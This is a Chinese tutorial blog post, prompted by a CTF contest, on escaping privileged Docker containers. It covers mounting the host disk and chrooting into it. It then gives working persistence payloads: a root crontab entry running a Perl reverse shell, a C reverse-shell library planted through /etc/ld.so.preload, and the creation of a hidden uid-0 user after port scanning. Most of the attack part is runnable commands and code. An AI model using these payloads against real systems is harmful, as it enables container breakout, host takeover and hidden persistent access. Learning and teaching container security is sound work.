文章目录
- 前言
- privileged,特权容器逃逸
- 环境配置
- 实际利用
- 实际环境利用
- 计划任务
- /var/spool/cron/crontabs/ 适用于ubuntu debain
- /var/spool/cron 适用于centos
- ld.so.preload
- ssh
前言
在10.15号的上海中华武数杯的渗透赛里做到了一个k8s的题目,这应该是我第一次在比赛里面实际做到云安全的题目(之前可能也有,记不清了)。但可能并不是很多人都了解云安全,这里我就简单在博客里面分享一点云安全的知识,从容器逃逸到k8s攻防,有兴趣的可以关注一下。
privileged,特权容器逃逸
这是云安全的第一章,那么自然要从特权容器开始。(如果你不会使用docker,也没有办法,我后面会简单介绍一下参数的含义)
特权容器在实战里面可能也会遇到,因为一些特殊的业务需求或者配置不当,导致容器可能被赋予了特权模式,如果这里容器用的是普通的runc容器非安全容器,那么存在逃逸的风险。
环境配置
docker run -it --privileged ubuntu:18.04
–privileged 以特权模式运行容器
-it -i interactive 代表交互 -t --tty 这两个一起使用就代表我们直接进入到容器的交互终端里,如果不需要交互可以使用-d 代表后台运行
具体可以运行docker run --help去查看解释
实际利用
上面就代表我们的docker启动好了,由于是第一章,这里也介绍一下实战里我们怎么判断获取的shell到底是主机还是容器
cat /proc/1/cgroup
可以看到有docker字眼
那我们就可以判断出来 环境是docker
后面就可以开始进行特权容器的逃逸
实际环境利用
如果查看到CapEff为0000003fffffffff代表为特权容器,可以逃逸
cat /proc/1/status|grep CapEff
CapEff: 0000003fffffffff
逃逸方法,挂载宿主机根目录
fdisk -l|grep Linux
mkdir /host
mount /dev/vda1 /host
chroot /host
这个时候只是文件系统层面逃逸,还没有彻底逃逸,需要用到接下来的方法
计划任务
/var/spool/cron/crontabs/ 适用于ubuntu debain
ls -la /var/spool/cron/crontabs
如果目录存在,代表我们可以写一个crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/crontabs/root
chmod 600 /var/spool/cron/crontabs/root
然后就是彻底逃逸了
/var/spool/cron 适用于centos
ls -la /var/spool/cron/
如果目录存在,代表我们可以写一个crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/root
chmod 600 /var/spool/cron/root
ld.so.preload
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
int tcp_port = 8080;
char *ip = "127.0.0.1";
__attribute__((destructor)) void test(){
remove("/etc/ld.so.preload");
int pid;
if((pid=fork())==0){
int fd;
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(tcp_port);
addr.sin_addr.s_addr = inet_addr(ip);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
system("/bin/bash");
}
}
gcc evil.c --shared -fPIC -o evil.so
上传evil.so到/tmp
echo '/tmp/evil.so' >/etc/ld.so.preload
然后下次系统会自动load这个so,并且可以实现无感知注入,达到逃逸,不过这种注入还是需要类似有运维操作才可以触发,或者说有新进程创建
ssh
当文件系统逃逸到宿主机上,可以做端口扫描
nc -nvz -w2 172.17.0.1 1-65535 2>&1|grep succeeded
如果发现宿主机开放了ssh服务,那我们可以直接ssh登陆到宿主机上实现逃逸
直接adduser
adduser test
passwd test
同时可以修改/etc/passwd 把test uid改为0变成root
![2023年中国预缩机产量、需求量及市场规模分析[图]](https://img-blog.csdnimg.cn/img_convert/43a48e8e0320b04113b238725c30a15c.png)
